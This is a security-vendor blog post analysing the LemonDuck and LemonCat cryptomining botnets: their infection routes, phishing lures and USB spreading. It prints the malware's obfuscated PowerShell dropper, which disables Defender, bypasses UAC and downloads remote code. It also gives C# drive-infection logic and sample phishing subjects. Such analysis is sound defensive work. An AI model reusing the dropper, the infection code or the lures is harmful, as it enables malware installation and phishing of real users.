The Duck and Cat infrastructures use similar subdomains, and they use the same task names, such as “blackball”. Both infrastructures also utilize the same packaged components hosted on similar or identical sites for their mining, lateral movement, and competition-removal scripts, as well as many of the same function calls.

The fact that the Cat infrastructure is used for more dangerous campaigns does not deprioritize malware infections from the Duck infrastructure. Instead, this intelligence adds important context for understanding this threat: the same set of tools, access, and methods can be re-used at dynamic intervals, to greater impact. Despite common implications that cryptocurrency miners are less threatening than other malware, its core functionality mirrors non-monetized software, making any botnet infection worthy of prioritization.

Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures

Initial access

LemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns.

LemonDuck acts as a loader for many other follow-on activities, but one if its main functions is to spread by compromising other systems. Since its first appearance, the LemonDuck operators have leveraged scans against both Windows and Linux devices for open or weakly authenticated SMB, Exchange, SQL, Hadoop, REDIS, RDP, or other edge devices that might be vulnerable to password spray or application vulnerabilities like CVE-2017-0144 (EternalBlue), CVE-2017-8464 (LNK RCE), CVE-2019-0708 (BlueKeep), CVE-2020-0796 (SMBGhost), CVE-2021-26855 (ProxyLogon), CVE-2021-26857 (ProxyLogon), CVE-2021-26858 (ProxyLogon), and CVE-2021-27065 (ProxyLogon).

Once inside a system with an Outlook mailbox, as part of its normal exploitation behavior, LemonDuck attempts to run a script that utilizes the credentials present on the device. The script instructs the mailbox to send copies of a phishing message with preset messages and attachments to all contacts.

Because of this method of contact messaging, security controls that rely on determining if an email is sent from a suspicious sender don’t apply. This means that email security policies that reduce scanning or coverage for internal mail need to be re-evaluated, as sending emails through contact scraping is very effective at bypassing email controls.

From mid-2020 to March 2021, LemonDuck’s email subjects and body content have remained static, as have the attachment names and formats. These attachment names and formats have changed very little from similar campaigns that occurred in early 2020.


Sample email subjects Sample email body content
  • The Truth of COVID-19
  • COVID-19 nCov Special info WHO
  • WTF
  • What the fcuk
  • good bye
  • farewell letter
  • broken file
  • This is your order?
  • Virus actually comes from United States of America
  • very important infomation for Covid-19
  • see attached document for your action and discretion.
  • the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future.
  • what’s wrong with you?are you out of your mind!!!!!
  • are you out of your mind!!!!!what ‘s wrong with you?
  • good bye, keep in touch
  • can you help me to fix the file,i can’t read it
  • file is brokened, i can’t open it

The attachment used for these lures is one of three types: .doc, .js, or a .zip containing a .js file. Whatever the type, the file is named “readme”. Occasionally, all three types are present in the same email.

Figure 3. Sample email

While the JavaScript is detected by many security vendors, it might be classified with generic detection names. It could be valuable for organizations to sanitize JavaScript or VBScript executing or calling prompts (such as PowerShell) directly from mail downloads through solutions such as custom detection rules.

Since LemonDuck began operating, the .zip to .js file execution method is the most common. The JavaScript has replaced the scheduled task that LemonDuck previously used to kickstart the PowerShell script. This PowerShell script has looked very similar throughout 2020 and 2021, with minor changes depending on the version, indicating continued development. Below is a comparison of changes from the most recent iterations of the email-delivered downloads and those from April of 2020.


April 2020 PowerShell script March 2021 PowerShell script
var cmd =new ActiveXObject("WScript.Shell");var cmdstr="cmd /c start /b notepad "+WScript.ScriptFullName+" & powershell -w hidden -c "if([Environment]::OSVersion.version.Major -eq '10'){Set-ItemProperty -Path 'HKCU:Environment' -Name 'windir' -Value 'cmd /c powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring 1 & powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''*%username%*%computername%''+[Environment]::OSVersion.version.Major) &::';sleep 1;schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I;Remove-ItemProperty -Path 'HKCU:Environment' -Name 'windir' -Force}else{IEx(ne`w-obj`ect Net.WebC`lient).DownloadString('');bpu -method migwiz -Payload 'powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''*%username%*%computername%''+[Environment]::OSVersion.version.Majo
//This File is broken.
var cmd =new ActiveXObject("WScript.Shell");var cmdstr="cmd /c start /b notepad "+WScript.ScriptFullName+" & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'')";,0,1);
//This File is broken.


After the emails are sent, the inbox is cleaned to remove traces of these mails. This method of self-spreading is attempted on any affected device that has a mailbox, regardless of whether it is an Exchange server.

Other common methods of infection include movement within the compromised environment, as well as through USB and connected drives. These processes are often kicked off automatically and have occurred consistently throughout the entirety of LemonDuck’s operation.

These methods run as a series of C# scripts that gather available drives for infection. They also create a running list of drives that are already infected based on whether it finds the threat already installed. Once checked against the running list of infected drives, these scripts attempt to create a set of hidden files in the home directory, including a copy of readme.js. Any device that has been affected by the LemonDuck implants at any time could have had any number of drives attached to it that are compromised in this manner. This makes this behavior a possible entry vector for additional attacks.

DriveInfo[] drives = DriveInfo.GetDrives();
foreach (DriveInfo drive in drives)
if (blacklist.Contains(drive.Name))
{ continue;}
Console.WriteLine("Detect drive:"+drive.Name);
if (IsSupported(drive))
if (!File.Exists(drive + home + inf_data))
Console.WriteLine("Try to infect "+drive.Name);
if (CreateHomeDirectory(drive.Name) && Infect(drive.Name))
else {
Console.WriteLine(drive.Name+" already infected!");

Comprehensive protection against a wide-ranging malware operation

The cross-domain visibility and coordinated defense delivered by Microsoft 365 Defender is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Microsoft 365 Defender has AI-powered industry-leading protections that can stop multi-component threats like LemonDuck across domains and across platforms. Microsoft 365 Defender for Office 365 detects the malicious emails sent by the LemonDuck botnet to deliver malware payloads as well as spread the bot loader. Microsoft Defender for Endpoint detects and blocks LemonDuck implants, payloads, and malicious activity on Linux and Windows.

More importantly, Microsoft 365 Defender provides rich investigation tools that can expose detections of LemonDuck activity, including attempts to compromise and gain a foothold on the network, so security operations teams can efficiently and confidently respond to and resolve these attacks. Microsoft 365 Defender correlates cross-platform, cross-domain signals to paint the end-to-end attack chain, allowing organizations to see the full impact of an attack. We also published a threat analytics article on this threat. Microsoft 365 Defender customers can use this report to get important technical details, guidance for investigation, consolidated incidents, and steps to mitigate this threat in particular and modern cyberattacks in general.

In Part 2 of this blog series, we’ll share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general, automatic behavior as well as human-initialized behavior. We will also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks.


Microsoft 365 Defender Threat Intelligence Team

The post When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure appeared first on Microsoft Security Blog.

Posted in Skype for Business